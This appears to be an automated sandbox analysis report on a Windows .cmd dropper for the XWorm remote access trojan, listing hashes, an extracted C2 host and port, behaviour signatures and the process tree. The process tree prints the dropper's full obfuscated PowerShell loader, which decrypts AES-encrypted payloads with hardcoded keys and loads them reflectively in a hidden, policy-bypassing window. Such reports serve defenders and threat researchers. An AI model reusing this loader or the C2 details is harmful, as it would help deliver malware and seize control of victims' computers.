Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 12:54

General

  • Target

    582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd

  • Size

    82KB

  • MD5

    8b962a01cb7b585d3308701068180e39

  • SHA1

    56528670260aa0d4b60fbffdc7566a3654112f8d

  • SHA256

    582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651

  • SHA512

    56b5012d96decb4fabef930becdc35593fbc34fcc0bfde36316a07586a2ad9d605b989db87f22ba5c0757aa78417ac7c79afee29a4cd0719aac8306a2ada56e7

  • SSDEEP

    1536:orogwg5pVXbSClWeINO/7lP3zsY8rTVRIJ9KPhv74+bha95O:7SpgeIo/7lP3OWahc+bha95O

Malware Config

Extracted

Family

xworm

Version

5.0

C2

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4448
    • C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      2⤵
        PID:3932
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('76J7bEzHtX3VLkuJZ3oCAIh8u4PXgvIrPrnTbE0uYjM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PvXjXUmyPwzlCxyLb5VMvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAoSC=New-Object System.IO.MemoryStream(,$param_var); $DqjpG=New-Object System.IO.MemoryStream; $gTgrK=New-Object System.IO.Compression.GZipStream($WAoSC, [IO.Compression.CompressionMode]::Decompress); $gTgrK.CopyTo($DqjpG); $gTgrK.Dispose(); $WAoSC.Dispose(); $DqjpG.Dispose(); $DqjpG.ToArray();}function execute_function($param_var,$param2_var){ $KJzOY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SIuiX=$KJzOY.EntryPoint; $SIuiX.Invoke($null, $param2_var);}$psbhS = 'C:\Users\Admin\AppData\Local\Temp\582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd';$host.UI.RawUI.WindowTitle = $psbhS;$KrZUn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($psbhS).Split([Environment]::NewLine);foreach ($gGiAE in $KrZUn) { if ($gGiAE.StartsWith('zVnkucItcDIJmveRwHFJ')) { $FQbRn=$gGiAE.Substring(20); break; }}$payloads_var=[string[]]$FQbRn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:5112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3020

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1rdlnbs.bh4.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3020-17-0x00007FFE2BA60000-0x00007FFE2BB1E000-memory.dmp
        Filesize

        760KB

      • memory/3020-16-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp
        Filesize

        2.0MB

      • memory/3020-11-0x00007FFE0D4E0000-0x00007FFE0DFA1000-memory.dmp
        Filesize

        10.8MB

      • memory/3020-12-0x00007FFE0D4E0000-0x00007FFE0DFA1000-memory.dmp
        Filesize

        10.8MB

      • memory/3020-13-0x00000258478B0000-0x00000258478F4000-memory.dmp
        Filesize

        272KB

      • memory/3020-14-0x0000025847980000-0x00000258479F6000-memory.dmp
        Filesize

        472KB

      • memory/3020-1-0x0000025847370000-0x0000025847392000-memory.dmp
        Filesize

        136KB

      • memory/3020-0-0x00007FFE0D4E3000-0x00007FFE0D4E5000-memory.dmp
        Filesize

        8KB

      • memory/3020-15-0x00000258473C0000-0x00000258473D0000-memory.dmp
        Filesize

        64KB

      • memory/3020-18-0x00000258474F0000-0x0000025847500000-memory.dmp
        Filesize

        64KB

      • memory/3020-19-0x0000025847500000-0x0000025847510000-memory.dmp
        Filesize

        64KB

      • memory/3020-20-0x00007FFE0D4E0000-0x00007FFE0DFA1000-memory.dmp
        Filesize

        10.8MB

      • memory/3020-22-0x00007FFE0D4E3000-0x00007FFE0D4E5000-memory.dmp
        Filesize

        8KB

      • memory/3020-23-0x00007FFE0D4E0000-0x00007FFE0DFA1000-memory.dmp
        Filesize

        10.8MB

      • memory/3020-24-0x00007FFE0D4E0000-0x00007FFE0DFA1000-memory.dmp
        Filesize

        10.8MB